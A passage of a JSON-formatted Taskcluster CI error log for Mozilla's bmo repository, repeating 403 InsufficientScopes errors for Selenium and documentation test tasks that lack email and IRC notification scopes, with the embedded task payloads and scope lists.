\\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Selenium Tests\\\",\\n    \\\"description\\\": \\\"Selenium Tests\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-28T02:27:09.132Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T02:27:09.132Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"D-DfahTTRYOxDmjmjfK8Ew\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T02:27:09.132Z\\\"\\n}\\n  time:     2016-09-28T02:27:09.283Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"O7l6ANVbRXujeGUm5bV2Dg\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Sel\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"selenium\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/selenium_log\\\\\\\"\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/selenium.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Selenium Tests\\\",\\n    \\\"description\\\": \\\"Selenium Tests\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-28T02:27:09.132Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T02:27:09.132Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"D-DfahTTRYOxDmjmjfK8Ew\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T02:27:09.132Z\\\"\\n}\\n  time:     2016-09-28T02:27:09.283Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"O7l6ANVbRXujeGUm5bV2Dg\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"Sel\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"selenium\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 8,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-bteam\",\n                            \"GITHUB_BASE_SHA\": \"639a051e3aea3608efd7607b944b2c33aa17cfe5\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"mozilla-bteam\",\n                            \"GITHUB_HEAD_SHA\": \"4250271527caadb3eefd54ccf068f610f5d93a46\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"mozilla-bteam@noreply.github.com\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            },\n                            \"public/httpd_error_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/httpd/error_log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            },\n                            \"public/selenium_log\\\"\": {\n                                \"type\": \"file\",\n                                \"path\": \"/selenium.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Selenium Tests\",\n                        \"description\": \"Selenium Tests\",\n                        \"owner\": \"mozilla-bteam@noreply.github.com\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-28T02:27:09.132Z\",\n                    \"deadline\": \"2016-09-29T02:27:09.132Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"D-DfahTTRYOxDmjmjfK8Ew\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-29T02:27:09.132Z\"\n                },\n                \"time\": \"2016-09-28T02:27:09.283Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"QKJeYnbsTw-iD6uK1kPJUQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Doc\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"docs\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Documentation Build Test\\\",\\n    \\\"description\\\": \\\"Documentation Build Test\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-28T02:27:09.131Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T02:27:09.131Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"D-DfahTTRYOxDmjmjfK8Ew\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T02:27:09.131Z\\\"\\n}\\n  time:     2016-09-28T02:27:09.285Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"QKJeYnbsTw-iD6uK1kPJUQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Doc\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"docs\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Documentation Build Test\\\",\\n    \\\"description\\\": \\\"Documentation Build Test\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-28T02:27:09.131Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T02:27:09.131Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"D-DfahTTRYOxDmjmjfK8Ew\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T02:27:09.131Z\\\"\\n}\\n  time:     2016-09-28T02:27:09.285Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    